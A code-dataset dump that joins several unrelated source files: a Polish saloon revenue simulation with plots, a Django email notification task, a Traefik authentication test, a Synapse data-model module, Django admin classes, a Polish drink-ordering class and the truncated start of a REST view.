waiting_time = np.inf\n shuffle(bartenders_in_simulation) # works inplace\n for x in bartenders_in_simulation:\n if x[1] <= clock[0]:\n # A free bartender available, customer is served\n # Potentially check whether an if or random number generation is faster here\n duration = x[0] * flirt_time * np.random.uniform() + serve_time\n x[1] = clock[0] + duration\n revenue += drink_price + np.random.gamma(shape=5, scale=avg_tip / 5) * x[0]\n events.append((clock[0] + duration + np.random.exponential(drink_time),\n 'Customer_choice', 'existing'))\n waiting_time = False\n break\n else:\n waiting_time = min(waiting_time, x[1])\n # Can we handle waiting within the same loop without creating an extra iteration?\n\n # If no bartender, wait at the bar\n if waiting_time:\n # Calculate cumulative waiting time\n try:\n time_in_queue = clock[2] + waiting_time - clock[0]\n except IndexError:\n time_in_queue = waiting_time - clock[0]\n # Determine if client gets nervous\n if time_in_queue > patience_threshold:\n if np.random.uniform() < max(pmin_queue_shootout, clock[0] / 600 * p_queue_shootout):\n events.append((clock[0] + patience_threshold, 'Shootout'))\n else:\n events.append((waiting_time, 'Customer_drinks', time_in_queue))\n\n elif clock[1] == 'Sheriff_entry':\n sheriff_present = True\n\n elif clock[1] == 'Sheriff_exit':\n sheriff_present = False\n\n elif clock[1] == 'Shootout':\n if not sheriff_present:\n event_history.append(clock)\n revenue -= shootout_loss * max(1, np.log(clock[0]) / np.log(420)) + (\n np.random.uniform() < p_pianist_killed) * pianist_net_worth\n return revenue, event_history\n # Decide on scenario handling here\n\n elif clock[1] == 'Poker_finish':\n outcome = np.random.uniform()\n if outcome < p_lost_everything:\n # The loser starts a shootout\n events.append((clock[0], 'Shootout'))\n elif outcome < p_jackpot:\n # The winner buys everybody a round\n revenue += customer_count * drink_price\n # Some players stay, some leave, some grab a drink\n poker_table = np.random.randint(poker_table_size)\n leavers = np.random.binomial(poker_table_size - poker_table, p_leave)\n customer_count -= leavers\n if (poker_table_size - poker_table - leavers) > 0:\n events.append(\n (clock[0], 'Customer_drinks') * (poker_table_size - poker_table - leavers))\n \n elif clock[1] == 'Lambda_down':\n customer_lambda -= 5 # Avg time between new customers 5 mins shorter\n\n event_history.append(clock)\n # Get next event\n clock = events.pop(get_next_event(events))\n\n return revenue, event_history\n\n\ndef run_simulation(\n n_simulations,\n time_horizon=10 * 60,\n bartenders=(False, True),\n customer_lambda=25,\n p_drink=0.9,\n serve_time=5,\n flirt_time=15,\n drink_time=35,\n drink_price=2,\n avg_tip=1,\n patience_threshold=15,\n pmin_queue_shootout=0.03,\n p_queue_shootout=0.06,\n p_pianist_killed=0.05,\n pianist_net_worth=450,\n shootout_loss=200,\n poker_table_size=5,\n poker_length=10,\n p_leave=0.1,\n p_lost_everything=0.02,\n p_jackpot=0.04,\n):\n revenues = np.zeros(n_simulations)\n event_histories = []\n for simulation_number in range(n_simulations):\n result, history = \\\n model(\n time_horizon=time_horizon,\n bartenders=bartenders,\n customer_lambda=customer_lambda,\n p_drink=p_drink,\n serve_time=serve_time,\n flirt_time=flirt_time,\n drink_time=drink_time,\n drink_price=drink_price,\n avg_tip=avg_tip,\n patience_threshold=patience_threshold,\n pmin_queue_shootout=pmin_queue_shootout,\n p_queue_shootout=p_queue_shootout,\n p_pianist_killed=p_pianist_killed,\n pianist_net_worth=pianist_net_worth,\n shootout_loss=shootout_loss,\n poker_table_size=poker_table_size,\n poker_length=poker_length,\n p_leave=p_leave,\n p_lost_everything=p_lost_everything,\n p_jackpot=p_jackpot,\n )\n revenues[simulation_number] = result\n event_histories.append(history)\n\n return revenues, event_histories\n\n\n# ## Scenariusz bazowy\n# In[]:\n\nresults_normal, _ = run_simulation(n_simulations=1000)\n\n# In[]:\n\nplot_saving_mode = True\n\n# In[]:\n\n\nprint(\"średni dochód: \" + str(results_normal.mean()))\nprint(\"odchylenie z dochodu: \" + str(results_normal.std()))\n\n\n# In[]:\n\n\nplt.figure(figsize = (8, 4))\nplt.hist(results_normal, bins=100, density = True, color = 'blue')\nplt.ylabel(\"Częstość\")\nplt.xlabel(\"Przychód [$]\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/histogram.pdf')\nelse:\n plt.show()\n\n\n# ## Liczba zatrudnionych barmanów\n# In[]:\n\n\ndef find_opt_solution(max_male, max_female, params = {'n_simulations': 200}):\n bartender_results = np.zeros((max_male+1, max_female+1))\n \n for i in tqdm.tqdm( product( np.arange(max_male+1), np.arange(max_female+1) ) ):\n # creating unique combination of male and female bartenders\n params['bartenders'] = [False] * i[0] + [True] * i[1]\n #running simulation\n results, _ = run_simulation(**params)\n #appending results\n bartender_results[i] = results.mean()\n \n path_matrix = np.zeros((max_male + 1, max_female + 1))\n optimum = 0\n diags = [bartender_results[::-1,:].diagonal(i) for i in range(1-bartender_results.shape[0], bartender_results.shape[1])]\n \n for i, x in enumerate(diags):\n i0 = min(i, path_matrix.shape[0]-1) - x.argmax()\n i1 = i-i0\n path_matrix[i0, i1] = x.max() - optimum\n optimum = x.max()\n return bartender_results, path_matrix\n\n# In[]:\n\nbartender_results, path_matrix = find_opt_solution(10, 10, {'n_simulations': 1000})\n\n# In[]:\n\n\nplt.figure(figsize = (8, 5))\nsns.heatmap(bartender_results)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/barmani.pdf')\nelse:\n plt.show()\n\n# In[]:\n\n\nplt.figure(figsize = (8,5))\nsns.set(style = 'whitegrid')\nsns.heatmap(path_matrix, cmap = 'seismic_r', center = 0)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/opt_sciezka.pdf')\nelse:\n plt.show()\n\n# ## Strategia cenowa\n# In[]:\n\n\nresults_expensive, _ = run_simulation(n_simulations=n_simulations, drink_price=4, patience_threshold=10)\nresults_cheap, _ = run_simulation(n_simulations=n_simulations)\nresults_super_cheap, _ = run_simulation(\n n_simulations=n_simulations,\n drink_price=1,\n patience_threshold=20,\n customer_lambda=10)\n\n\n# In[]:\n\n\nprint(\"średnia:\")\nprint(\"droższe drinki: \" + str(results_expensive.mean()))\nprint(\"tańsze drinki: \" + str(results_cheap.mean()))\nprint(\"super tanie drinki: \" + str(results_super_cheap.mean()))\n\nprint(\"\\nodchylenie:\")\nprint(\"droższe drinki: \" + str(results_expensive.std()))\nprint(\"tańsze drinki: \" + str(results_cheap.std()))\nprint(\"super tanie drinki: \" + str(results_super_cheap.std()))\n\n\n# In[]:\n\n\nplt.figure(figsize=(8, 4))\ndf_to_plot = pd.DataFrame(\n {\n \"Strategia cenowa salonu\": \n [\"normalne ceny\"] * n_simulations + \n [\"niskie ceny\"] * n_simulations + \n [\"wysokie ceny\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_cheap, results_super_cheap, results_expensive), axis=0)\n }\n)\nax = sns.barplot(x=\"Strategia cenowa salonu\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/drinki.pdf')\nelse:\n plt.show()\n\n\n# # Więlkosc stolow do pokera\n# In[]:\n\n\nresults_normal, _ = run_simulation(n_simulations=n_simulations)\nresults_1, _ = run_simulation(n_simulations=n_simulations, poker_table_size=6, poker_length=15)\nresults_2, _ = run_simulation(n_simulations=n_simulations, poker_table_size=7, poker_length=20)\nresults_3, _ = run_simulation(n_simulations=n_simulations, poker_table_size=8, poker_length=25)\n\n\n# In[]:\n\n\nplt.figure(figsize=(8,4))\ndf_to_plot = pd.DataFrame(\n {\n \"Stół do pokera\": \n [\"na 5 graczy\"] * n_simulations + [\"na 6 graczy\"] * n_simulations + [\"na 7 graczy\"] * n_simulations + [\"na 8 graczy\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_normal, results_1, results_2, results_3), axis=0)\n }\n)\nsns.barplot(x=\"Stół do pokera\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/poker.pdf')\nelse:\n plt.show()\n\n\n# In[]:\n\n\nprint(\"średni przychód normal: \" + str(results_normal.mean()))\nprint(\"średni przychód 1: \" + str(results_1.mean()))\nprint(\"średni przychód 2: \" + str(results_2.mean()))\nprint(\"średni przychód 3: \" + str(results_3.mean()))\n\nprint(\"odchylenie normal: \" + str(results_normal.std()))\nprint(\"odchylenie przychód 1: \" + str(results_1.std()))\nprint(\"odchylenie przychód 2: \" + str(results_2.std()))\nprint(\"odchylenie przychód 3: \" + str(results_3.std()))\n\n\n\n\n\n\n\n\n# # Analiza wrażliwości\n\n# ## Zatrudnianie ładniejszych kelnerek\n\n# In[]:\n\nn_simulations = 1000\nbartenders_opt = [True, True, True]\n\n# In[]:\n\nresults_normal, _ = run_simulation(n_simulations=n_simulations,\n bartenders = bartenders_opt)\nresults_beautiful, _ = run_simulation(n_simulations=n_simulations,\n bartenders = bartenders_opt,\n flirt_time=25,\n avg_tip=5)\n\n\n# In[]:\n\nplt.figure(figsize=(8,4))\ndf_to_plot = pd.DataFrame(\n {\n \"Personel\": \n [\"ładny\"] * n_simulations + [\"ładniejszy\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_normal, results_beautiful), axis=0)\n }\n)\nax = sns.barplot(x=\"Personel\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/personel.pdf')\nelse:\n plt.show()\n\n\n# In[]:\n\n\nprint(\"średni przychód ładna: \" + str(results_normal.mean()))\nprint(\"średni przychód ładniejsza: \" + str(results_beautiful.mean()))\n\nprint(\"odchylenie ładna: \" + str(results_normal.std()))\nprint(\"odchylenie ładniejsza: \" + str(results_beautiful.std()))\n\n# In[ ]:\n\nbartender_results_pretty, path_matrix_pretty = find_opt_solution(10, 10, {'n_simulations': n_simulations,\n 'flirt_time':25, 'avg_tip':5})\n\n\n# In[ ]:\n\nplt.figure(figsize = (8, 5))\nsns.heatmap(bartender_results)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/barmani_ladni.pdf')\nelse:\n plt.show()\n\n# In[ ]:\n\nplt.figure(figsize = (8,5))\nsns.heatmap(path_matrix, cmap = 'seismic_r', center = 0)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/opt_sciezka_ladni.pdf')\nelse:\n plt.show()\n\n# ## Próg cierpliwosci klientow\n# In[]:\n\n\npatience_results = np.zeros(11)\npatience_std = np.zeros(11)\n\nfor patience in tqdm.tqdm(range(len(patience_results))):\n results, _ = run_simulation(n_simulations=int(n_simulations), patience_threshold=patience)\n patience_results[patience] = results.mean()\n patience_std[patience] = results.std()\n\n\n# In[]:\n\n\nplt.figure(figsize = (8,4))\nplt.fill_between(np.arange(0, 11), y1 = patience_results - patience_std,\n y2 = patience_results + patience_std,\n alpha = 0.3)\nplt.plot(patience_results)\nplt.hlines(y = 0, xmin = 0, xmax = 10, linestyle = 'dashed')\nplt.xlabel('Próg cierpliwości [min]')\nplt.ylabel('Średni zysk baru [$]')\nif plot_saving_mode:\n plt.savefig('raport/wykresy/zajecie_w_kolejce.pdf')\nelse:\n plt.show()\n\n\n# ## Lepszy jakosciowo wystrój\n\n# In[]:\n\n\ndecor_results = np.zeros(20)\ndecor_ccount = np.zeros(20)\n\nfor decor in tqdm.tqdm(range(1, len(decor_results))):\n results, histories = run_simulation(\n n_simulations=n_simulations,\n bartenders = bartenders_opt,\n shootout_loss=20*decor, \n customer_lambda=(45 - 2*decor)) \n decor_results[decor] = results.mean()\n decor_ccount[decor] = np.mean([[x[1:3] for x in history].count(('Customer_choice', 'new')) for history in histories])\n\n\n# In[]:\n\n\nplt.figure(figsize = (8,4))\nplt.plot(decor_results)\nplt.xlabel('Jakość wystroju')\nplt.ylabel('Średni zysk baru [$]')\nplt.hlines(y = 0, xmin = 0, xmax = 20, linestyle = 'dashed')\nif plot_saving_mode:\n plt.savefig('raport/wykresy/wystroj.pdf')\nelse:\n plt.show()\n\n\n# # Unused scenarios\n# # Strzelaniny\n# In[]:\n\n\nresults_faster_shootout, _ = run_simulation(n_simulations=n_simulations, p_lost_everything=0.05)\nresults_normal_shootout, _ = run_simulation(n_simulations=n_simulations)\nresults_slower_shootout, _ = run_simulation(n_simulations=n_simulations, p_lost_everything=0.01)\n\n\n# In[]:\n\n\nprint(\"średnia:\")\nprint(\"szybciej strzelaniny: \" + str(results_faster_shootout.mean()))\nprint(\"normalne strzelaniny: \" + str(results_normal_shootout.mean()))\nprint(\"wolniejsze strzelaniny: \" + str(results_slower_shootout.mean()))\n\n\n# In[]:\n\n\nplt.figure(figsize=(8,4))\nf, axes = plt.subplots(1, 1)\ndf_to_plot = pd.DataFrame(\n {\n \"Prawdopodobieństwo strzelaniny\": \n [\"niskie\"] * n_simulations + \n [\"normalne\"] * n_simulations + \n [\"wysokie\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_slower_shootout, results_normal_shootout, results_faster_shootout), axis=0)\n }\n)\nax = sns.barplot(x=\"Prawdopodobieństwo strzelaniny\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/p_strzelaniny.pdf')\nelse:\n plt.show()\n\n","repo_name":"puchmichal/ZMS","sub_path":"project_3/simulation_do_wyslania.py","file_name":"simulation_do_wyslania.py","file_ext":"py","file_size_in_byte":17509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12296033732","text":"from django.core.mail import send_mail\nfrom app.celery import app\nfrom products.models import Product\nfrom users.models import User\nfrom products.subscriptions import (\n unsubscribe_from_product_arrival_notification\n)\n\nimport logging\n\n\nlogger = logging.getLogger()\n\n\ndef test_email_message(user, product, email=None) -> None:\n if not email:\n if not user.email:\n logger.error(f'error to send email to {email} of notification product arrived {product.id} -> no email')\n try:\n send_mail(\n subject='product arrival notification',\n message=f'hi ,{user}, {product} is arrived',\n from_email='django-store@example.com',\n recipient_list=[email],\n fail_silently=False,\n )\n except Exception as e:\n logger.error(f'error to send email to {email} of notification product arrived {product.id} -> {e}')\n\n\n@app.task\ndef send_product_arrival_notification(user_id, product_id) -> None:\n user = User.objects.get(id=user_id)\n product = Product.objects.get(id=product_id)\n test_email_message(\n user=user,\n product=product,\n )\n unsubscribe_from_product_arrival_notification(user, product_id)\n","repo_name":"w44121/django-store","sub_path":"src/products/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71139795610","text":"import pytest\n\nfrom compute_wps import models\nfrom compute_wps.auth import traefik\nfrom compute_wps import exceptions\n\n@pytest.mark.django_db\ndef test_authenticate(mocker):\n meta = {}\n\n with pytest.raises(exceptions.AuthError):\n traefik.authenticate(meta)\n\n spy_user = mocker.spy(models.User.objects, \"get_or_create\")\n\n meta = {\"X-Forwarded-User\": \"user1@domain1.test\"}\n\n user = traefik.authenticate(meta)\n\n assert user.username == \"user1\"\n\n user = traefik.authenticate(meta)\n\n assert spy_user.call_count == 2\n\ndef test_traefikauthentication(mocker):\n auth = traefik.TraefikAuthentication()\n\n class Request:\n def META(self):\n return \"user1\"\n\n authenticate = mocker.patch.object(traefik, \"authenticate\")\n authenticate.return_value = None\n\n user = auth.authenticate(Request())\n\n assert user is None\n\n authenticate.return_value = \"user1\"\n\n user = auth.authenticate(Request())\n\n assert user == (\"user1\", None)\n","repo_name":"ESGF/esgf-compute-wps","sub_path":"compute/compute_wps/compute_wps/tests/test_auth_traefik.py","file_name":"test_auth_traefik.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"41455921559","text":"import logging\n\nimport synapse.common as s_common\nimport synapse.lib.tufo as s_tufo\nfrom synapse.lib.module import CoreModule, modelrev\n\nlogger = logging.getLogger(__name__)\n\nclass SynMod(CoreModule):\n @staticmethod\n def getBaseModels():\n modl = {\n\n 'types': (\n ('syn:splice', {'subof': 'guid'}),\n ('syn:auth:user', {'subof': 'str'}),\n ('syn:auth:role', {'subof': 'str'}),\n ('syn:auth:userrole', {'subof': 'comp', 'fields': 'user=syn:auth:user,role=syn:auth:role'}),\n ('syn:tagform', {'subof': 'comp', 'fields': 'tag,syn:tag|form,syn:prop', 'ex': '(foo.bar,baz:faz)'}),\n\n ('syn:alias', {'subof': 'str', 'regex': r'^\\$[a-z_]+$',\n 'doc': 'A synapse guid alias', 'ex': '$visi'}),\n ('syn:fifo', {'subof': 'comp', 'fields': 'name=str:lwr'}),\n ('syn:ingest', {'subof': 'str:lwr'}),\n ('syn:log', {'subof': 'guid'}),\n\n ),\n\n 'forms': (\n\n ('syn:splice', {'local': 1}, (\n ('act', {'ptype': 'str:lwr'}),\n ('time', {'ptype': 'time'}),\n ('node', {'ptype': 'guid'}),\n ('user', {'ptype': 'str:lwr'}),\n\n ('tag', {'ptype': 'str:lwr'}),\n ('form', {'ptype': 'str:lwr'}),\n ('valu', {'ptype': 'str:lwr'}),\n )),\n\n ('syn:alias', {'local': 1}, (\n ('iden', {'ptype': 'guid', 'defval': '*',\n 'doc': 'The GUID for the given alias name'}),\n )),\n\n ('syn:auth:user', {'local': 1}, (\n ('storm:limit:lift',\n {'ptype': 'int', 'defval': 10000, 'doc': 'The storm query lift limit for the user'}),\n ('storm:limit:time',\n {'ptype': 'int', 'defval': 120, 'doc': 'The storm query time limit for the user'}),\n )),\n\n ('syn:auth:role', {'local': 1}, (\n ('desc', {'ptype': 'str'}),\n )),\n\n ('syn:auth:userrole', {'local': 1}, (\n ('user', {'ptype': 'syn:auth:user'}),\n ('role', {'ptype': 'syn:auth:role'}),\n )),\n\n ('syn:fifo', {'ptype': 'syn:fifo', 'local': 1}, (\n ('name', {'ptype': 'str:lwr', 'doc': 'The fifo description'}),\n ('desc', {'ptype': 'str', 'doc': 'The fifo description'}),\n )),\n\n ('syn:trigger', {'ptype': 'guid', 'local': 1}, (\n ('en', {'ptype': 'bool', 'defval': 0, 'doc': 'Is the trigger currently enabled'}),\n ('on', {'ptype': 'syn:perm'}),\n ('run', {'ptype': 'syn:storm'}),\n ('user', {'ptype': 'syn:auth:user'}),\n )),\n\n ('syn:core', {'doc': 'A node representing a unique Cortex'}, ()),\n ('syn:form', {'doc': 'The base form type.'}, (\n ('doc', {'ptype': 'str', 'doc': 'basic form definition'}),\n ('ver', {'ptype': 'int', 'doc': 'form version within the model'}),\n ('model', {'ptype': 'str', 'doc': 'which model defines a given form'}),\n ('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this form'}),\n ('local', {'ptype': 'bool', 'defval': 0,\n 'doc': 'Flag used to determine if a form should not be included in splices'}),\n )),\n ('syn:prop', {'doc': 'The base property type.'}, (\n ('doc', {'ptype': 'str', 'doc': 'Description of the property definition.'}),\n ('title', {'ptype': 'str', 'doc': 'A short description of the property definition.'}),\n ('form', {'ptype': 'syn:prop', 'doc': 'The form of the property.'}),\n ('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this field'}),\n ('req', {'ptype': 'bool', 'doc': 'Set to 1 if this property is required to form teh node.'}),\n ('relname', {'ptype': 'str', 'doc': 'Relative name of the property'}),\n ('base', {'ptype': 'str', 'doc': 'Base name of the property'}),\n ('glob', {'ptype': 'bool', 'defval': 0, 'doc': 'Set to 1 if this property defines a glob'}),\n ('defval', {'doc': 'Set to the default value for this property', 'glob': 1}),\n ('univ', {'ptype': 'bool',\n 'doc': 'Specifies if a prop is universal and has no form associated with it.'}),\n )),\n ('syn:type', {'doc': 'The base type type.'}, (\n ('ctor', {'ptype': 'str', 'doc': 'Python path to the class used to instantiate the type.'}),\n ('subof', {'ptype': 'syn:type', 'doc': 'Type which this inherits from.'}),\n ('*', {'glob': 1})\n )),\n ('syn:tag', {'doc': 'The base form for a synapse tag.'}, (\n ('up', {'ptype': 'syn:tag', 'doc': ''}),\n ('doc', {'ptype': 'str', 'defval': '', }),\n ('depth', {'ptype': 'int', 'doc': 'How deep the tag is in the hierarchy', 'defval': 0}),\n ('title', {'ptype': 'str', 'doc': '', 'defval': ''}),\n ('base', {'ptype': 'str', 'doc': '', 'ro': 1}),\n\n )),\n ('syn:tagform', {'doc': 'A node describing the meaning of a tag on a specific form'}, (\n ('tag', {'ptype': 'syn:tag', 'doc': 'The tag being documented', 'ro': 1}),\n ('form', {'ptype': 'syn:prop', 'doc': 'The form that the tag applies too', 'ro': 1}),\n ('doc', {'ptype': 'str:txt', 'defval': '??',\n 'doc': 'The long form description for what the tag means on the given node form'}),\n ('title', {'ptype': 'str:txt', 'defval': '??',\n 'doc': 'The short name for what the tag means the given node form'}),\n )),\n ('syn:model', {'ptype': 'str', 'doc': 'prefix for all forms with in the model'}, (\n ('hash', {'ptype': 'guid', 'doc': 'version hash for the current model'}),\n ('prefix', {'ptype': 'syn:prop', 'doc': 'Prefix used by teh types/forms in the model'}),\n )),\n ('syn:seq', {'ptype': 'str:lwr', 'doc': 'A sequential id generation tracker'}, (\n ('width', {'ptype': 'int', 'defval': 0, 'doc': 'How many digits to use to represent the number'}),\n ('nextvalu', {'ptype': 'int', 'defval': 0, 'doc': 'The next sequential value'}),\n )),\n ('syn:ingest', {'ptype': 'syn:ingest', 'local': 1}, (\n ('time', {'ptype': 'time'}),\n ('text', {'ptype': 'json'})\n )),\n ('syn:log', {'ptype': 'guid', 'local': 1}, (\n ('subsys', {'ptype': 'str', 'defval': '??',\n 'doc': 'Named subsystem which originaed teh log event'}),\n ('level', {'ptype': 'int', 'defval': logging.WARNING, }),\n ('time', {'ptype': 'time', 'doc': 'When the log event occured'}),\n ('exc', {'ptype': 'str', 'doc': 'Exception class name if caused by an exception'}),\n ('info:*', {'glob': 1})\n )),\n )\n }\n\n name = 'syn'\n return ((name, modl),)\n\n @modelrev('syn', 201709051630)\n def _delOldModelNodes(self):\n types = self.core.getRowsByProp('syn:type')\n forms = self.core.getRowsByProp('syn:form')\n props = self.core.getRowsByProp('syn:prop')\n syncore = self.core.getRowsByProp('.:modl:vers:syn:core')\n\n with self.core.getCoreXact():\n [self.core.delRowsById(r[0]) for r in types]\n [self.core.delRowsById(r[0]) for r in forms]\n [self.core.delRowsById(r[0]) for r in props]\n [self.core.delRowsById(r[0]) for r in syncore]\n\n @modelrev('syn', 201709191412)\n def _revModl201709191412(self):\n '''\n Migrate the XREF types to use the propvalu syntax.\n '''\n tick = s_common.now()\n adds = []\n dels = set()\n\n nforms = set()\n\n for form in self.core.getModelDict().get('forms'):\n sforms = self.core.getTypeOfs(form)\n if 'xref' in sforms:\n nforms.add(form)\n\n for ntyp in nforms:\n nodes = self.core.getTufosByProp(ntyp)\n xtyp = '{}:xtype'.format(ntyp)\n xrefp = '{}:xref'.format(ntyp)\n xrefpint = '{}:xref:intval'.format(ntyp)\n xrefpstr = '{}:xref:strval'.format(ntyp)\n xrefprop = '{}:xref:prop'.format(ntyp)\n for node in nodes:\n iden = node[0]\n srcvtype = node[1].get(xtyp)\n if srcvtype is None:\n # This is expensive node level introspection :(\n for prop, valu in s_tufo.props(node).items():\n if prop.startswith('xref:'):\n form = prop.split('xref:', 1)[1]\n if self.core.isTufoForm(form):\n srcvtype = form\n break\n if not srcvtype:\n raise s_common.NoSuchProp(iden=node[0], type=ntyp,\n mesg='Unable to find a xref prop which is a form for migrating a '\n 'XREF node.')\n srcprp = '{}:xref:{}'.format(ntyp, srcvtype)\n srcv = node[1].get(srcprp)\n valu, subs = self.core.getPropNorm(xrefp, [srcvtype, srcv])\n adds.append((iden, xrefp, valu, tick))\n adds.append((iden, xrefprop, srcvtype, tick))\n if 'intval' in subs:\n adds.append((iden, xrefpint, subs.get('intval'), tick))\n else:\n adds.append((iden, xrefpstr, subs.get('strval'), tick))\n dels.add(srcprp)\n dels.add(xtyp)\n with self.core.getCoreXact():\n self.core.addRows(adds)\n for prop in dels:\n self.core.delRowsByProp(prop)\n\n @modelrev('syn', 201710191144)\n def _revModl201710191144(self):\n with self.core.getCoreXact():\n now = s_common.now()\n adds = []\n logger.debug('Lifting tufo:form rows')\n for i, _, v, t in self.core.store.getRowsByProp('tufo:form'):\n adds.append((i, 'node:created', t, now),)\n logger.debug('Deleting existing node:created rows')\n self.core.store.delRowsByProp('node:created')\n if adds:\n tot = len(adds)\n logger.debug('Adding {:,d} node:created rows'.format(tot))\n i = 0\n n = 100000\n for chunk in s_common.chunks(adds, n):\n self.core.store.addRows(chunk)\n i = i + len(chunk)\n logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))\n logger.debug('Finished adding node:created rows to the Cortex')\n\n @modelrev('syn', 201711012123)\n def _revModl201711012123(self):\n now = s_common.now()\n forms = sorted(self.core.getTufoForms())\n nforms = len(forms)\n for n, form in enumerate(forms):\n adds = []\n logger.debug('Computing node:ndef rows for [{}]'.format(form))\n for i, p, v, t in self.core.store.getRowsByProp(form):\n # This is quicker than going through the norm process\n nv = s_common.guid((p, v))\n adds.append((i, 'node:ndef', nv, now))\n\n if adds:\n tot = len(adds)\n logger.debug('Adding {:,d} node:ndef rows for [{}]'.format(tot, form))\n with self.core.getCoreXact() as xact:\n i = 0\n nt = 100000\n for chunk in s_common.chunks(adds, nt):\n self.core.store.addRows(chunk)\n i = i + len(chunk)\n logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))\n logger.debug('Processed {:,d} [{}%] forms.'.format(n, int((n / nforms) * 100)))\n logger.debug('Finished adding node:ndef rows to the Cortex')\n","repo_name":"larrycameron80/synapse","sub_path":"synapse/models/syn.py","file_name":"syn.py","file_ext":"py","file_size_in_byte":12757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"30185593592","text":"from django.contrib import admin\nfrom models import (Province, District, Zone, School)\nfrom rts.utils import DistrictIdFilter, ManagePermissions\nfrom rts.actions import export_select_fields_csv_action\n\n\n\nclass ProvinceAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\"]\n\n\nclass DistrictAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\", \"province\"]\n\n\nclass ZoneAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\", \"district\"]\n search_fields = [\"name\"]\n\n\nclass SchoolAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"emis\", \"name\", \"zone\", \"display_district\", \"display_province\"]\n search_fields = [\"emis\"]\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"zone\":\n kwargs[\"queryset\"] = Zone.objects.order_by('name')\n return super(SchoolAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\n def queryset(self, request):\n \"\"\"\n Limits queries for pages that belong to district admin\n \"\"\"\n qs = super(SchoolAdmin, self).queryset(request)\n return DistrictIdFilter(parent=self, request=request, qs=qs).queryset()\n\n\nadmin.site.register(Province, ProvinceAdmin)\nadmin.site.register(District, DistrictAdmin)\nadmin.site.register(Zone, ZoneAdmin)\nadmin.site.register(School, SchoolAdmin)\n","repo_name":"praekeltfoundation/django-rts-zambia","sub_path":"hierarchy/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71567680732","text":"class Drink:\n _cups = [\"레귤러\",\"점보\"]\n _ices = [\"0%\", \"50%\", \"100%\", \"150%\"]\n _sugar = [\"0%\", \"50%\", \"100%\", \"150%\"]\n def __init__(self, name, price):\n self.name=name\n self.price=price\n self.cup=0#0:레귤러,1: 점보\n self.ice=2 #0:0%, 1:50%,2:100$, 3:150$ \n self.sugar =2 #0:0%, 1=50%,2=100%, 3=150%\n\n def set_cup(self):\n self.cup = input (\"컵사이즈를 선택하세요(0:레귤러, 1=점보)\")\n if self.cup==\"\":\n self.cup=0\n else:\n self.cup= int (self.cup)\n \n\n def set_ice(self):\n self.ice = input(\"얼음량을 선택하세요(0:0%, 1:50%,2:100%, 3:150% \")\n if self.ice==\"\":\n self.ice=2\n else:\n self.ice= int (self.ice)\n\n def set_sugar(self):\n self.sugar = input(\"당도를 선택하세요. 0:0%, 1=50%,2=100%, 3=150%\")\n if self.sugar==\"\":\n self.sugar=2\n else:\n self.sugar= int (self.ice)\n \n def __str__(self):\n return \"이름:\"+self.name+\"\\t가격: \"+str(self.price)+\"\\t컵사이즈: \"+self._cups[self.cup]+\"\\t얼음량: \"+self._ices[self.ice]+\"\\t당도:\"+self._sugar[self.sugar]\n \n def order(self):\n self.set_cup()\n self.set_ice()\n self.set_sugar()","repo_name":"gyogo/Programming-Python-","sub_path":"아마스빈/drink.py","file_name":"drink.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39873469883","text":"from rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\n\r\nfrom components.comments.models import UserCommentsModel\r\nfrom components.comments.serializers import (\r\n UserCommentsListModelSerializer,\r\n)\r\nfrom components.metrics.models import WeatherMetricsModel\r\nfrom shared.api.views import 